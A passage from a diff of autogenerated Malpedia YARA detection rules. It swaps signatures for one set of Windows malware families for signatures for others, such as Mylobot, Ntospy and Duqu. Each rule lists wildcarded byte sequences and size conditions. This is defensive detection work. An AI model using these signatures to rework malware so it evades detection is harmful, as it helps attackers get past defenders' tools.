+		$sequence_2 = { 85c0 742c 488b0d???????? 488d15b5220100 e8???????? 85c0 7415 }
+		$sequence_3 = { 85c0 7506 448d7001 eb2e e8???????? 4c8d05a59f0d00 bab4010000 }
+		$sequence_4 = { e8???????? 837f1400 4c8d05cfc01700 488b0f 488b5728 740d 41b9e7000000 }
+		$sequence_5 = { 8d4a8e e8???????? 488b4b20 e8???????? 41b8e1010000 488d155ddf0e00 488bcb }
+		$sequence_6 = { eb33 498bc4 eb4f e8???????? 4c8d058fc01400 ba1c010000 488d0d13c01400 }
+		$sequence_7 = { 7525 e8???????? 4c8d0545051600 baa4060000 488bcb e8???????? baab000000 }
+		$sequence_8 = { e8???????? 8b4730 4c8d057fcd1500 448b4b08 8d4eff 89442428 ba0c010800 }
+		$sequence_9 = { e8???????? 4c8d05cb5a0f00 baab010000 488d0d2f5a0f00 e8???????? 4533c0 418d4e06 }
 
 	condition:
-		7 of them and filesize < 140288
+		7 of them and filesize < 6235136
 }
-rule MALPEDIA_Win_Alreay_Auto : FILE
+rule MALPEDIA_Win_Mylobot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01f61c78-bfa8-5f5f-a6a2-e7995cbc405d"
+		id = "10f8483b-f798-51f2-8a0d-4ad60f69bcdb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alreay_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mylobot_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "bcfb6d409e0586aac8c1117f30af44579c0e0ed1018da12aba1f4024fa72bbe6"
+		logic_hash = "a859373208876596e4d4c654a67f12e66a950382de85503fc39b74c533ee7259"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88808,32 +88986,38 @@ rule MALPEDIA_Win_Alreay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b742450 2bc6 f7d8 1bc0 259adaffff 5f 5e }
-		$sequence_1 = { 8d442414 45 52 50 892d???????? e8???????? 8bf0 }
-		$sequence_2 = { c1e21c 89442420 8954241c 8bc3 8bd5 e8???????? 8b4c2420 }
-		$sequence_3 = { 8ac1 f6d0 8a543418 8a5c3448 22d0 22d9 0ad3 }
-		$sequence_4 = { 89742424 7fa9 5f 5e 5d b801000000 5b }
-		$sequence_5 = { eb31 0fbf942454010000 8d442434 52 8d4c2414 50 8d542420 }
-		$sequence_6 = { 894e0c 8901 8b4c241c 8b460c 51 56 895804 }
-		$sequence_7 = { 33c3 8b5c2424 03dd 03c3 8b5c2414 8dac03d6c162ca 8b442464 }
-		$sequence_8 = { 8b8f98000000 89af90000000 83c901 899f94000000 898f98000000 8b879c000000 89879c000000 }
-		$sequence_9 = { 3d2c010000 7d1f 8d8664860000 50 e8???????? 8bd8 83c404 }
+		$sequence_0 = { 8a4c2413 84c9 888c04bc010000 8b442414 }
+		$sequence_1 = { 50 e8???????? 83c424 8d7c2440 33c0 6a0a 59 }
+		$sequence_2 = { 8b6e24 03c7 03ef 89442414 85c9 }
+		$sequence_3 = { 6810270000 ff15???????? 83bf0801000001 7509 5f 5e 33c0 }
+		$sequence_4 = { 50 e8???????? 59 8a4c2413 84c9 888c048c050000 }
+		$sequence_5 = { e8???????? 8b0d???????? 898170010000 a1???????? ffb070010000 }
+		$sequence_6 = { 8bd0 e8???????? e9???????? 3c13 0f858f000000 }
+		$sequence_7 = { 8364242000 8d8424bc000000 50 e8???????? 50 }
+		$sequence_8 = { ffd7 85c0 7517 a1???????? }
+		$sequence_9 = { ffd6 a1???????? 6aff 50 ff15???????? }
+		$sequence_10 = { 83c428 a3???????? a3???????? a3???????? a3???????? a1???????? }
+		$sequence_11 = { 8b0d???????? 6a01 6a00 6a00 6a00 }
+		$sequence_12 = { 8b0f 8b5618 33db 898de0fdffff }
+		$sequence_13 = { e8???????? 8d95d0fdffff 52 b822b19818 }
+		$sequence_14 = { 7511 83c802 50 8d9558f5ffff 52 }
+		$sequence_15 = { 51 57 ff15???????? 8b35???????? 8d642400 8b5508 }
 
 	condition:
-		7 of them and filesize < 1867776
+		7 of them and filesize < 8028160
 }
-rule MALPEDIA_Win_Treasurehunter_Auto : FILE
+rule MALPEDIA_Win_Kikothac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "742c7bf5-d2b7-520e-a089-1fe564ad2be1"
+		id = "d385826e-58d3-5814-919d-ec257a5aa756"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.treasurehunter_auto.yar#L1-L104"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kikothac_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "9cfdb80d896aafedd2a1ceb8f4988ae951779a5109bafb233ecba9d043eab6e8"
+		logic_hash = "44c91c13eb1dd4a6656263ce0b69b86cf3ff2448fb7726df446bdef3b4382332"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88847,30 +89031,32 @@ rule MALPEDIA_Win_Treasurehunter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 51 53 56 8b35???????? 8bd9 8b4d08 }
-		$sequence_1 = { ba???????? 53 56 57 6a01 }
-		$sequence_2 = { 8bd9 8b4d08 57 8955fc e8???????? 8bce }
-		$sequence_3 = { 56 8bf8 e8???????? 68???????? 57 e8???????? }
-		$sequence_4 = { 85d2 7e0b 4a e8???????? 0fafc6 5e }
-		$sequence_5 = { 57 e8???????? 83c40c be???????? ff36 }
-		$sequence_6 = { 6a2f 68???????? 57 ff15???????? 85c0 }
-		$sequence_7 = { 0f47c7 50 56 53 8945fc ff15???????? }
+		$sequence_0 = { 50 68???????? 6802000080 c7450c00000000 ff15???????? 85c0 753a }
+		$sequence_1 = { 884c240c 9c 89542438 c6042486 }
+		$sequence_2 = { 10c6 f5 8b5504 f8 e9???????? 9c 60 }
+		$sequence_3 = { 66d3cd 894c2420 6897d1eb0f f5 6895c1b1d4 c744242400000000 66c704240957 }
+		$sequence_4 = { 53 56 c745e890024100 894dec 894df0 380d???????? 746f }
+		$sequence_5 = { 8b15???????? 50 51 52 ff15???????? 8b06 8b10 }
+		$sequence_6 = { 56 33c0 68fe070000 50 8d8d02f8ffff 51 }
+		$sequence_7 = { e9???????? 0fb6d2 fec8 882424 c0c004 f7da 660fb3ca }
+		$sequence_8 = { f9 83c502 f5 9c 0fa5d0 ff74241c }
+		$sequence_9 = { 85c0 7644 3d00040000 760d b800040000 8d4df4 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Milkmaid_Auto : FILE
+rule MALPEDIA_Win_Ntospy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5948a1f6-8eaf-5535-ac9f-e8e1c89ea107"
+		id = "b4a63087-adf5-553a-badd-9c3b2b74fa54"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.milkmaid_auto.yar#L1-L98"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ntospy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ntospy_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b839dfa6db2fa7bf81ab8ee61b0a1d4a011d7a0ef5b792c9852059c0fc803283"
+		logic_hash = "cce1d343f3ff134391791227274b4a5b285b13f3052430b7eb6796387898d86b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88884,30 +89070,32 @@ rule MALPEDIA_Win_Milkmaid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 64892500000000 83ec08 56 68???????? 8d4c2408 c744240c00000000 }
-		$sequence_1 = { c68424dc28010002 e8???????? 8d4c2410 c68424dc28010001 }
-		$sequence_2 = { 68???????? 50 b8c8280100 64892500000000 e8???????? }
-		$sequence_3 = { 8b4c240c 50 51 8d8c2480000000 }
-		$sequence_4 = { 6a1a 6a00 ff15???????? 6aff 8d4c2408 }
-		$sequence_5 = { e8???????? 8d4c240c c78424dc280100ffffffff e8???????? 33c0 8b8c24d4280100 }
-		$sequence_6 = { 33d2 eb05 8b5708 2bd1 8b5c2428 }
-		$sequence_7 = { c744240c00000000 e8???????? 6800010000 8d4c2408 c744241801000000 }
+		$sequence_0 = { c705????????01000000 c705????????01000000 b808000000 486bc000 488d0d0ead0000 8b542430 48891401 }
+		$sequence_1 = { 837a2400 7d04 32c0 eb14 b001 eb10 }
+		$sequence_2 = { 488d0585520100 c3 8325????????00 c3 48895c2408 55 488dac2440fbffff }
+		$sequence_3 = { 4c8bda 488d356780ffff 4183e30f 488bfa 492bfb }
+		$sequence_4 = { 498784f620600100 eb1e 488bc3 498784f620600100 4885c0 }
+		$sequence_5 = { b91c000000 4c8d0560770000 488d155d770000 e8???????? 4885c0 7416 }
+		$sequence_6 = { 740f 833c240c 7410 eb15 }
+		$sequence_7 = { 488b4c2448 ff15???????? 48c744242000000000 4c8d4c2440 41b804000000 }
+		$sequence_8 = { 4883ec28 488b442440 4883c028 488b4c2440 4883c118 }
+		$sequence_9 = { 4c8d2dcaf80000 448bf3 498bc5 8d6b01 3938 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 208896
 }
-rule MALPEDIA_Win_Ceeloader_Auto : FILE
+rule MALPEDIA_Win_Marap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4d991a8-4075-5bcb-8916-cb7ba3e3bc9e"
+		id = "2cc3d8fa-aa39-5bef-af3b-a091606785c2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ceeloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.marap_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "a2c60d828b1d749bfbc654154ea7639eec54d50fcdb5e7a81ec6415d729400d3"
+		logic_hash = "981ff96ccf9321bc9cf0b93466d635ede7fbc6c0341e04e670ea58028783ac37"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88921,32 +89109,32 @@ rule MALPEDIA_Win_Ceeloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8ff f00fc101 83f801 751c 488b45e8 488b8888000000 488d05f5cf0800 }
-		$sequence_1 = { 89842488040000 8b84245c0c0000 0b8424600c0000 8984245c0c0000 8b8424600c0000 0b8424600c0000 898424600c0000 }
-		$sequence_2 = { 448b942444020000 4531d0 c78424b40d000000000000 488b9424d8070000 48898c2438020000 4889d1 488d1521160b00 }
-		$sequence_3 = { 44899c2454040000 448b9c2454040000 89c6 81e6b1524402 89b42450040000 8bb42450040000 c1e604 }
-		$sequence_4 = { 4181e100ffffff 44898c24fc000000 448b8c24fc000000 448b15???????? 4501c8 4539d0 48898424b0000000 }
-		$sequence_5 = { 0f8433000000 8b842418010000 898424d0000000 e8???????? 8b8c2414010000 2b8c2418010000 99 }
-		$sequence_6 = { 4c8d0d7d050e00 488b8c2410010000 4889942400010000 4c89ca 4c8b8c2400010000 898424fc000000 ff15???????? }
-		$sequence_7 = { 6689d3 66239c2476110000 66899c2474110000 6689d3 66239c2474110000 66899c2472110000 6689d3 }
-		$sequence_8 = { 4181e1f5274b02 44898c24d0050000 448b8c24d0050000 4189c2 4181e2f5274b02 44899424cc050000 448b9424cc050000 }
-		$sequence_9 = { 0315???????? 8915???????? 8b15???????? 448b05???????? 4189d2 4531c2 4431d2 }
+		$sequence_0 = { e9???????? 8386e41d000002 e9???????? 8386e41d000003 }
+		$sequence_1 = { 7409 8386e41d000008 eb2f 84c0 7908 018ee41d0000 }
+		$sequence_2 = { ff15???????? 8bf0 89b59cfbffff 83feff 7472 }
+		$sequence_3 = { ff15???????? 85c0 7425 8b480c 8b11 8b02 }
+		$sequence_4 = { 81fb00040000 737e 8bc7 8bd7 668b08 }
+		$sequence_5 = { 0fbe84c1f8cb0010 6a07 c1f804 59 }
+		$sequence_6 = { 83c40c 8d7bfe 668b4702 83c702 6685c0 75f4 }
+		$sequence_7 = { 8d1c8580320110 8b03 83e71f c1e706 8a4c3824 }
+		$sequence_8 = { 8d4310 8d8954f40010 5a 668b31 }
+		$sequence_9 = { 80f901 0f8487000000 6683fa06 7519 84c0 }
 
 	condition:
-		7 of them and filesize < 2321408
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Slub_Auto : FILE
+rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94a02bf2-7103-5d7e-aa8d-633d7fba4826"
+		id = "9565c5c7-2061-57e3-9feb-b946c3a86959"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slub_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_013_korean_malware_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "aee363d67e6a37d8547028a75375273379b56a2505a09b01f68a1ed9e200ef20"
+		logic_hash = "821fb0825aa17f5a4d3c05e9768273454f282d58ecf369f512d9a619a9aa5b99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88960,32 +89148,32 @@ rule MALPEDIA_Win_Slub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb02 8bc7 83fa10 7204 8b37 eb02 }
-		$sequence_1 = { 57 e8???????? 83a634010000fd 83c410 c6863801000001 80bea40b000000 740a }
-		$sequence_2 = { 83bfac010000ff b810020000 b920020000 0f45c1 833c3802 7408 8b9fe0000000 }
-		$sequence_3 = { 83e802 0f84bf000000 83e801 0f848c000000 83e801 0f8489000000 8d442420 }
-		$sequence_4 = { 50 8b842488000000 ff348594a18d00 8d8424ac000000 ffb42488000000 ff32 51 }
-		$sequence_5 = { 56 57 8bbc2450010000 8bd8 c1e304 be10020000 03df }
-		$sequence_6 = { 8b4c2424 8b4924 894c242c 85c9 743e 8b29 837d2402 }
-		$sequence_7 = { e8???????? 50 57 53 56 e8???????? 83c418 }
-		$sequence_8 = { 8b3b bd00000100 896c2420 80bf4d01000000 7410 8387480100000a bdf4ff0000 }
-		$sequence_9 = { 0f45c8 8d4530 2bc8 83f916 7349 8b55dc c645f301 }
+		$sequence_0 = { 83c404 b801000000 eb3f 53 }
+		$sequence_1 = { 57 8d442418 50 33ff 6a01 }
+		$sequence_2 = { 7304 8d44242c 8a1c38 0fb6cb 51 e8???????? }
+		$sequence_3 = { 68???????? 64a100000000 50 81ec44060000 a1???????? 33c4 89842440060000 }
+		$sequence_4 = { 8944240c eb08 c744240cf2030000 8b4c241c 51 ff15???????? 397c240c }
+		$sequence_5 = { 8b7c2418 8b6c2414 8908 8b0d???????? }
+		$sequence_6 = { 8b2d???????? 8d44240c 50 6800040000 8d4c241c }
+		$sequence_7 = { 43 803c337f 0f85f1feffff 33ff 5b 5d 3bf7 }
+		$sequence_8 = { 7419 8d542428 52 e8???????? }
+		$sequence_9 = { e8???????? 83c40c 33ff 8d9b00000000 8a543c14 8d5c2410 88542410 }
 
 	condition:
-		7 of them and filesize < 1785856
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Gcman_Auto : FILE
+rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e71f2c5a-eff6-5ad7-8a03-8a2026572314"
+		id = "29c37aae-f59e-5de0-b472-49827a85b93b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gcman_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "0044f6cfe83ca73eacc555f31b65cfd944699d03aa8981a24b8fc516dccbcc72"
+		logic_hash = "e7a70ab9b6a509f80d931123c1a82d7625f8b02d536427c2ae108e65b04e2ebe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88999,32 +89187,32 @@ rule MALPEDIA_Win_Gcman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744240400100000 8d85d8efffff 890424 e8???????? 8d85d8efffff }
-		$sequence_1 = { c74008fedcba98 8b4508 c7400c76543210 8b4508 }
-		$sequence_2 = { 89c2 83e230 8b4508 40 0fb600 }
-		$sequence_3 = { 898590e7ffff 833d????????00 750a c78590e7ffffdd624000 8b8590e7ffff 8944240c c7442408???????? }
-		$sequence_4 = { 8b4508 890424 e8???????? 8d0403 }
-		$sequence_5 = { 8b00 c1e818 8802 8b5508 83c204 8b450c 8b4004 }
-		$sequence_6 = { 8b4df0 01c1 8b45f4 89c2 c1e206 b0c0 20d0 }
-		$sequence_7 = { 31ce 0375a8 01f3 81eb06d85e15 c1c30b 01c3 }
-		$sequence_8 = { c1c004 01d0 89c6 31d6 31ce 0375a8 01f3 }
-		$sequence_9 = { 40 890424 e8???????? 8945fc 8b45fc 89442408 8b450c }
+		$sequence_0 = { 8b0d???????? 69c960ea0000 51 e8???????? }
+		$sequence_1 = { 83c404 c70200000000 56 8b35???????? ffd6 8b45b8 }
+		$sequence_2 = { 7461 6a01 53 e8???????? }
+		$sequence_3 = { 50 8d8c242c060000 51 68???????? 8d94242c040000 }
+		$sequence_4 = { c3 53 57 81faffff0000 7657 8b7e20 }
+		$sequence_5 = { 6800400000 50 57 ff15???????? eb4f 8d0c4a }
+		$sequence_6 = { 5f 8be5 5d c3 8b4dfc 51 ff15???????? }
+		$sequence_7 = { 7506 b805000000 c3 3b8a7c120000 }
+		$sequence_8 = { 8bf0 57 56 895dfc e8???????? }
+		$sequence_9 = { 5e 5d c20400 57 be02000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Helauto_Auto : FILE
+rule MALPEDIA_Win_Sword_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f4c5f14-ca45-53fe-8db7-58ae81e6cff8"
+		id = "d4f1eb68-153e-5ccd-81d3-89b6b9da3f3a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.helauto_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sword_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8c0415faca54a4465c0b97b35f2aed1c836ec68c9df037f6186699e53a26046b"
+		logic_hash = "065f81feabb14c35e08637eea61a6954f973d06eb84d7a6351d2f07f555efbd2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89038,32 +89226,32 @@ rule MALPEDIA_Win_Helauto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 59 8bc6 6a0a 33d2 59 }
-		$sequence_1 = { aa 8d8528feffff c7855cffffff01010000 50 66899d60ffffff }
-		$sequence_2 = { 8dbd9de5ffff c6859ce5ffff30 f3ab 66ab aa }
-		$sequence_3 = { 8b4510 69c0f4010000 50 8945ec }
-		$sequence_4 = { 6a44 8d85a8feffff 53 50 }
-		$sequence_5 = { 3b4510 75ad 395dfc 7409 }
-		$sequence_6 = { ff75fc ff15???????? 3bc3 0f8448070000 8d45b8 }
-		$sequence_7 = { 50 8d8598f7ffff 68ff030000 50 }
-		$sequence_8 = { e8???????? 8b45d4 83c40c 898568ffffff 8b45d0 6a1f }
-		$sequence_9 = { a3???????? 50 ff15???????? e9???????? 8b442408 48 7509 }
+		$sequence_0 = { 8d4c2430 6a01 51 e8???????? 83c410 }
+		$sequence_1 = { 8dbc24d40b0000 f3ab ebb7 8b542414 }
+		$sequence_2 = { 8b442410 50 ffd6 8d8c2484020000 }
+		$sequence_3 = { 81c408020000 c3 83c9ff 33c0 f2ae f7d1 2bf9 }
+		$sequence_4 = { 49 885c29ff 807d0022 7520 8d7d01 83c9ff }
+		$sequence_5 = { 81c4c40f0000 c3 8bb424d80f0000 8b442410 }
+		$sequence_6 = { b940000000 33c0 8d7c2419 8894241c010000 f3ab }
+		$sequence_7 = { 8d4c2420 6a3a 51 e8???????? 83c410 85c0 }
+		$sequence_8 = { f2ae f7d1 49 bf???????? 894c2414 83c9ff }
+		$sequence_9 = { f7d1 49 83f903 77c8 bf???????? }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Friedex_Auto : FILE
+rule MALPEDIA_Win_Duqu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2136bda7-6880-57af-8169-a2ba9b9744fa"
+		id = "424302fc-6577-56a8-8823-f2003c48bc5c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.friedex_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.duqu_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "3133b9fe228e62a956c776f3b2c9ea0b2f6b9e5dde15151f1885bdca3ce807d5"
+		logic_hash = "c898aec26da15be1184cad51dbcbbea7d5de6c2fe0a6afa2af1a2af031fa3007"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89077,40 +89265,40 @@ rule MALPEDIA_Win_Friedex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a26 8bc8 e8???????? 57 8bc8 e8???????? 6a65 }
-		$sequence_1 = { 03cd 0fb711 6685d2 75c1 6a2a 5f eb06 }
-		$sequence_2 = { eb16 0fb730 663bf7 7416 663bf2 7405 }
-		$sequence_3 = { eb0f 03c5 663938 74f9 33c9 }
-		$sequence_4 = { 85c0 740d ff742408 6a00 6a00 }
-		$sequence_5 = { 8b442408 53 55 56 57 6a2a 5f }
-		$sequence_6 = { 03f5 eb04 03c5 03cd }
-		$sequence_7 = { 6a3f 5a 663bfa 7408 8bce 8bc3 }
-		$sequence_8 = { c744240400000000 8955e8 e8???????? 8d0dbc30a500 890424 894c2404 }
-		$sequence_9 = { 891424 894c2404 8945f8 e8???????? 8d0d4430a500 }
-		$sequence_10 = { c3 55 89e5 83ec10 8b4508 8d0d4430a500 }
-		$sequence_11 = { 83c404 5d c3 55 89e5 8d055a23a500 }
-		$sequence_12 = { 894608 890c24 c744240400000000 8955ec e8???????? 8d0dad30a500 890424 }
-		$sequence_13 = { c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
-		$sequence_14 = { 8945d0 74e4 31c0 8d0d5a23a500 }
-		$sequence_15 = { e8???????? 8d0d4430a500 31d2 8b75f8 89460c 890c24 }
+		$sequence_0 = { e8???????? 8bd8 895c2414 85db 755b }
+		$sequence_1 = { 8bd7 84c0 74c7 33c9 3c2e }
+		$sequence_2 = { e8???????? 894624 85c0 0f8474020000 baf71ad500 8bcf }
+		$sequence_3 = { e8???????? ba2760f046 89463c 8bcf e8???????? 894640 85c0 }
+		$sequence_4 = { b9c64ff867 894c2424 8b07 03c6 c7442414ffff3f00 89442420 894c2418 }
+		$sequence_5 = { 56 51 8bf2 e8???????? }
+		$sequence_6 = { ba19729c9f 89461c 8bcb e8???????? ba4c1241f2 894630 }
+		$sequence_7 = { e8???????? ba56f0665d 894674 8bcb e8???????? ba244135d1 }
+		$sequence_8 = { ba0ded3515 8bcb e8???????? ba0b7bb6ba }
+		$sequence_9 = { 85c0 7465 e8???????? 85c0 }
+		$sequence_10 = { 8bec 51 57 33ff b9???????? }
+		$sequence_11 = { 8bec 51 66833d????????00 7429 }
+		$sequence_12 = { 8bec 51 a1???????? 56 57 6a28 }
+		$sequence_13 = { 8bec 51 53 56 be???????? 57 33db }
+		$sequence_14 = { 8bec 51 6a00 8d45fc 50 6a04 }
+		$sequence_15 = { 8bec 51 56 57 894dfc 8bfa b22e }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 18759680
 }
-rule MALPEDIA_Win_Blister_Auto : FILE
+rule MALPEDIA_Win_Cohhoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75a4d5c1-fad1-5de9-baeb-706545e990e7"
+		id = "79f1d359-2e68-5ef2-92e4-7c353f021a83"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blister_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cohhoc_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "cf8a8615a4d489a259d535fb620f06fe5362163915633c0aacc9d77eb620d2b5"
-		score = 60
-		quality = 25
+		logic_hash = "408be9b45dccb2589014666e6c29650297e9a497c2f3518d6cebc0080adee530"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89122,32 +89310,32 @@ rule MALPEDIA_Win_Blister_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745e8ca000000 c745f0cb000000 e8???????? 83c41c 3bc6 7414 ff7308 }
-		$sequence_1 = { e8???????? 8d45fc 50 8bcf e8???????? 85c0 7ce2 }
-		$sequence_2 = { 8bc8 e8???????? 8bd8 85db 0f8ca5000000 6a04 e8???????? }
-		$sequence_3 = { c1e910 33d2 663bd1 7513 52 52 e8???????? }
-		$sequence_4 = { 83f901 7f40 57 e8???????? 03de 33c9 6a02 }
-		$sequence_5 = { ff45f4 8b45f4 83c70c 3b45f8 72e3 eb07 c745ec01000000 }
-		$sequence_6 = { 7568 8bce e8???????? ebd6 ff7508 8bce }
-		$sequence_7 = { 85f6 7c7a 8b8df0ddffff 57 e8???????? 8bf0 85f6 }
-		$sequence_8 = { 56 ff10 8bf8 85ff 7409 6a01 }
-		$sequence_9 = { 59 894604 85c0 7503 895dfc 33ff 397dfc }
+		$sequence_0 = { f2ae 8b15???????? 33f6 f7d1 49 03cb }
+		$sequence_1 = { b809000000 c1e909 85c9 7e07 d1f9 40 }
+		$sequence_2 = { c705????????01000000 c705????????84000000 891d???????? 891d???????? }
+		$sequence_3 = { 8994245c010000 ff15???????? 8d542414 8d442424 52 50 ff15???????? }
+		$sequence_4 = { eb0a 8b75f4 c7451800000000 8b45fc 8b3d???????? }
+		$sequence_5 = { 8d9424ac020000 6aff 52 53 53 66ab ffd6 }
+		$sequence_6 = { 85c0 740f 8a4c2404 3808 }
